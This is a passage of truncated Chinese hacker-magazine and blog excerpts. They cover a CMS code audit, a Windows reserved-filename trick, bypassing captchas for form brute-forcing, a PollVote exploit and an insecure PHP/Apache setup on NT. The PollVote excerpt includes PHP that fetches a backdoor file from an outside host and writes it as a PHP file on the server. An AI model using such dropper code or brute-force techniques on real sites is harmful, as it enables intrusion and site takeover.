作者：小帥(xsser)@[0.S.T] 本文已发表在《黑客手册》第4期，转载请注明出处，或以超链接方式注明：http://blog.0kee.com/xiaoshuai 小帥's blog很久没去asp300溜达了，不去总觉得的对不起这个发布站的流量，也对不起黑客手册那么多读者的强烈要求（别扔鸡蛋！扔钱！），那好，既然牛都吹起来了，我不得不冒着生命危险看看代码吧，反正我下载下来的时候就觉得很伟大，这个系统很伟大，他吹的比我还大，好好，我们看他怎么说的：88red生成htm静态页面企业建站系统V3.0经过精心打造正式推出，集合了网站地图、企业新闻中心、企业产品、搜...

你会建立c:\con.txt吗？--windows文件系统漏洞唉，写完了前面的废话头都昏了，有错误及时告诉我哦。----------------------------如果你在想con.txt不是很正常吗？那好，你先去创建下，只要带有独立的con字样的文件就好，然后悟出什么了再看这篇文章（如果你用linux或者mac或者unix那就算了）。呵呵，正常来说带有con、prn、com1这样字眼的文件或目录是不能创建的(原因自己找)，但我想到了以前在安全焦点的一篇文章，是教你创建带"\"的文件夹的。当时的方法是用控制台命令（如果你叫dos命令那是不标准的）mkdircsk..\这样的语法创建的。看来...

验证码就是每次访问页面时随机生成的图片，内容一般是数字和字母（更厉害点的还有中文），需要访问者把图中的数字字母填到表单中提交，这样就有效地防止了暴力破解。验证码也用于防止恶意灌水、广告帖等。 溯雪是早年大名鼎鼎的黑客神器“刀光雪影”之一，其功能就是暴力破解表单，那时很是很流行的。但是后来有了验证码这个东西，几乎把溯雪推向了死路。但是真的完全是死路了吗？本文给你答案。 对于验证码机制，网上的攻击手法都是利用数学方法分析图片，当然我们不能老是跟着别人的思路走，那样就没创意了。 想想验证码的思路，就是每次登陆的地方访问一个脚本文件，该文件生成含验证码的图片并将值写入到S...

PollVote是一个投票系统，今天看了非安全的杂志，看了利用方法， 不过作者说利用过程的时候很烦琐，关键的时候又没说明白， 简单的说一下`` 首先建立2个文本 分别是creatfile.txt和phpdoor.txt creatfile.txt内容写 <? $f=file_get_contents("http://www.hackeroo.com/phpdoor.txt"); $ff=fopen("111.php","a"); fwrit...

这一个漏洞在 packetstorm 被发表，我把它翻成中文，加上自己的一些注解，希望对在 NT 上执行PHP 的朋友有一些帮助。当你下载 PHP 後，在它内含的安装文件中帮助了 PHP 在 NT + Apache Web Server 的安装方式，其中的安装帮助会要你将底下这几行设置加到 apache 的 httpd.conf 设置文件中，而这个安装文件将导引你将你的系统门户大开。...